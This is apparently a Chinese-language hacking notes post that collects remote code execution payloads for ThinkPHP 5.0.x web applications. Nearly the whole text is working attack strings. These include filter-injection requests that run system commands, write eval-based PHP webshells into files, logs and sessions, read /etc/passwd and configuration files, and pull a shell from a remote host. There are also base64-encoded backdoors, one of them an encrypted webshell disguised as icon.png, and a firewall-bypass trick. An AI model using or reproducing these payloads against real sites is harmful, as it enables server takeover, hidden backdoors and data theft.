thinkphp 5.0.1的坑
2021年04月18日判断是否存在
http://xxx.com/public
/index.php?s=captcha
/?s=captcha
5.0.5 版本不是完整版没有 captcha路由时 /index.php/index 5.0.12<thinkphp<5.0.24 并开启 debug 时 payload 如下 ?s=index/index _method=__construct&filter[]=system&server[REQUEST_METHOD]=calc 5.0.12<thinkphp<5.0.24 有 captcha 路由,无需开启 debug 时 payload 如下 ?s=captcha _method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get 5.0.22 开启debug 打印phpinfo /index.php/index _method=__construct&filter[]=phpinfo&server[REQUEST_METHOD]=1111111 读取日志 /index.php/index _method=__construct&filter[]=readfile&server[REQUEST_METHOD]=../runtime/log/202012/04.log 写shell到日志文件中 /index.php/index _method=__construct&filter[]=call_user_func&server[REQUEST_METHOD]=<?php @eval($_POST['cmd']);?> 包含日志文件 /index.php/index _method=__construct&filter[]=think\__include_file&server[REQUEST_METHOD]=../runtime/log/202012/04.log&cmd=phpinfo(); 5.0.22 有路由时 无需debug /index.php?s=captcha _method=__construct&filter[]=phpinfo&server[REQUEST_METHOD]=1111111&method=get
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
s=phpinfo()&_method=__construct&filter=assert _method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo _method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo _method=__construct&method=get&filter=call_user_func&get[]=phpinfo _method=__construct&method=get&filter[]=call_user_func&get[0]=phpinfo&get[1]=1 判断什么系统 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ipconfig 获取当前目录路径 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=chdir 在当前目录写入123.php _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php eval($_REQUEST[1])?>" >123.php /public/123.php?1=phpinfo();;)
http:/xxxx.com/?s=index/index/index
s=ipconfig&_mehthod=__construct$method=&filter[]=system
仅有assert函数可用的情况下 如何写入 如何读取mysql
include函数,可以根据此函数查看一些文件及其配置
s=include("/etc/passwd")&_method=__construct&filter=assert读取文件
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../application/.htaccess
s=include("../application/.htaccess")&_method=__construct&filter=assert
//ps:如果不加.. 请加上完整路径在读取出来文件之后,由于一些关键目录受到了管理员的更改,所以为了读取出来文件夹目录,我们用到了var_dump函数
var_dump函数,可以查看该路径下的文件,文件夹
s=var_dump(scandir('../application/'))&_method=__construct&filter=assert通过报错得知网站的目录是 /data/wwwroot/public/
意外发现在/data/目录下有网站备份文件
复制文件
s=copy("/data/ws.tar", "/data/wwwroot/public/ws.tar")&_method=__construct&filter=assert直接通过web下载下来,本地寻找config文件,连接进mysql
一个针对5.0.1版本研究出来的写入命令
file_put_contents函数,可以直接写入文件
s=file_put_contents('/data/wwwroot/test.php',base64_decode('PD9waHAgJHBhc3M9JF9QT1NUWydhYWFhJ107ZXZhbCgkcGFzcyk7Pz4'))&_method=__construct&filter=assert日志包含
写shell进日志
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['x'])?>通过日志包含getshell
_method=__construct&method=get&filter=think\__include_file&get[]=/www/wwroot/runtime/log/202110/28.log 对日志进行包含
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../data/runtime/log/201901/21.log&x=phpinfo();
日志文件较大copy新的一句话
/?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=../runtime/log/202012/03.log&apple=echo copy("https://www.xxx.com/1.txt","D:/phpstudy_pro/WWW/tp5/ant.php");
日志不可写尝试在C:/windows/temp/ 下写 ant
/?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=../runtime/log/202012/03.log&apple=file_put_contents(urldecode("%43%3A%5C%57%69%6E%64%6F%77%73%5C%54%65%6D%70%5C%61%6E%74"),fopen("https://www.xxx.com/1.txt",'r'));
查看一下写入是否成功
/?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=../runtime/log/202012/03.log&apple=$a="var_dump";$a(scandir(urldecode("%43%3A%5C%57%69%6E%64%6F%77%73%5C%54%65%6D%70")));
再次包含 C:/windows/temp/ant
/?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=C:\Windows\Temp\ant&ant=phpinfo();session包含getshell
写shell进session
POST /?s=captcha
Cookie: PHPSESSID=kking
_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1
包含session getshell
POST /?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&get[]=/tmp/sess_kking&server[]=1
设置session
POST /?s=captcha
_method=__construct&filter[]=think\Session::set&method=get&get[]=aaPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYWJjJ10pKTs/Pg&server[]=1
<?php eval(base64_decode($_POST['abc']));?>
使用伪协议包含过防火墙
POST /?s=captcha&r=cGhwaW5mbygpOw==
_method=__construct&filter[]=strrev&filter[]=think\__include_file&method=get&server[]=1&get[]=tsetkk_sses/pmt/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:php
_method=__construct&method=get&filter[]=strrve&filter[]=think\__include_file&get[]=/tmp/sess_kking/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:php&abc=cGhwaW5mbygpOw==
对payload加密处理
_method=__construct&method=get&filter=think\Session::set&get[]=<?PHP
$str="PD9waHAKQHNlc3Npb25fc3RhcnQoKTsKQHNldF90aW1lX2xpbWl0KDApOwpAZXJyb3JfcmVwb3J0aW5nKDApOwpmdW5jdGlvbiBlbmNvZGUoJEQsJEspewogICAgZm9yKCRpPTA7JGk8c3RybGVuKCREKTskaSsrKSB7CiAgICAgICAgJGMgPSAkS1skaSsxJjE1XTsKICAgICAgICAkRFskaV0gPSAkRFskaV1eJGM7CiAgICB9CiAgICByZXR1cm4gJEQ7Cn0KJHBheWxvYWROYW1lPSdwYXlsb2FkJzsKJGtleT0nM2M2ZTBiOGE5YzE1MjI0YSc7CiRkYXRhPWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwppZiAoJGRhdGEhPT1mYWxzZSl7CiAgICAkZGF0YT1lbmNvZGUoJGRhdGEsJGtleSk7CiAgICBpZiAoaXNzZXQoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0pKXsKICAgICAgICAkcGF5bG9hZD1lbmNvZGUoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0sJGtleSk7CgkJZXZhbCgkcGF5bG9hZCk7CiAgICAgICAgZWNobyBlbmNvZGUoQHJ1bigkZGF0YSksJGtleSk7CiAgICB9ZWxzZXsKICAgICAgICBpZiAoc3RyaXBvcygkZGF0YSwiZ2V0QmFzaWNzSW5mbyIpIT09ZmFsc2UpewogICAgICAgICAgICAkX1NFU1NJT05bJHBheWxvYWROYW1lXT1lbmNvZGUoJGRhdGEsJGtleSk7CiAgICAgICAgfQogICAgfQp9";
file_put_contents('/www/wwwroot/icon.png',base64_decode("$str"));;https://www.cnblogs.com/r00tuser/p/11410157.html
https://y4er.com/post/thinkphp5-rce/
https://forum.90sec.com/t/topic/704
https://www.cnblogs.com/whoami101/p/13364884.html
https://www.mrwu.red/web/3348.html
https://jokong201695.github.io/2020/05/12/ThinkPHP-%E6%BC%8F%E6%B4%9E%E5%88%97%E8%A1%A8/